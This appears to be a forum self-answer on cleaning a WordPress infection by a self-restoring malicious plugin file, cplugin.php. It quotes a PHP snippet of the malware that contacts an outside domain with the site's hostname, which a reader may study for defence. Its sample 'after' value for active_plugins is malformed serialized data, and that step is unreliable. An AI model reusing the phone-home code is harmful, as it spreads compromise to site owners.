There is a recent attack where numerous wordpress websites are taken down due to a file cplugin.php
which is a malware.
The malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
I have figured out a solution and posting the answer myself to help all users out there.
Edit:
There are reports of the same file being named differently for users: ccode.php, cplugin.php
and helad.php
in which case the fix can be modified.
This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downsite. Deleting the file is of no use as it re-appears. Also it will infect all other sites on a multi website server. Fortunately after working for hours have figured out the fix. Please read this carefully to fix your site:
Backup your database and files
Edit your wp_options table, find the property active_plugins
and edit it, you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
Edit this to remove the cplugin.php entry , start from i
upto the next ;
and remove that. (Make sure you Database it backed up incase you make some mistake). The new entry without the cplugin.php
will look like:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
site_transient_update_plugins
before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....
after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....
After updating your fields, navigate back to your main plugins folder /wp-content/plugins
and delete the file cplugin.php
Login to your wordpress dashboard and re activate all your plugins
Voila you have fixed your website.
I think the technical reason for this would be that the malware registers itself as a wordpress plugin which automatically replaces the file upon deletion. Fortunately the malware is badly written code so instead of running it mostly throws 500 error
. But in anycase I would recommend to delete it immediately incase it updates.
Edit: According to the wordpress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in wordpress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in anycase, so would recommend the 1st solution atleast after gaining access to the site.